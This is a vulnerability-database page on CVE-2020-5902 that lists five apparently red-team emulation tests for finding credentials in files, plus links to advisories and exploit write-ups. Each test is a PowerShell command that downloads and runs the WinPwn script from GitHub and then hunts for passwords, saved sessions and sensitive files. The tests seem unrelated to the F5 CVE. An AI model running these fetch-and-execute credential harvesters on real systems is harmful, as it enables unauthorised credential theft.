T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (14)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2020-5902
support.f5.com
GitHub CVE
https://support.f5.com/csp/article/K52145254
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/158334/BIG-IP-TMUI-Remote-Code-Execution.html
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/158366/F5-BIG-IP-TMUI-Directory-Traversal-File-Upload-Code-Execution.html
kb.cert.org
GitHub CVE third-party-advisory
https://www.kb.cert.org/vuls/id/290915
criticalstart.com
GitHub CVE
https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/
badpackets.net
GitHub CVE
https://badpackets.net/over-3000-f5-big-ip-endpoints-vulnerable-to-cve-2020-5902/
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/158414/Checker-CVE-2020-5902.html
github.com
GitHub CVE
https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/158581/F5-Big-IP-13.1.3-Build-0.0.6-Local-File-Inclusion.html
swarm.ptsecurity.com
GitHub CVE
https://swarm.ptsecurity.com/rce-in-f5-big-ip/
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/175671/F5-BIG-IP-TMUI-Directory-Traversal-File-Upload-Code-Execution.html
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-5902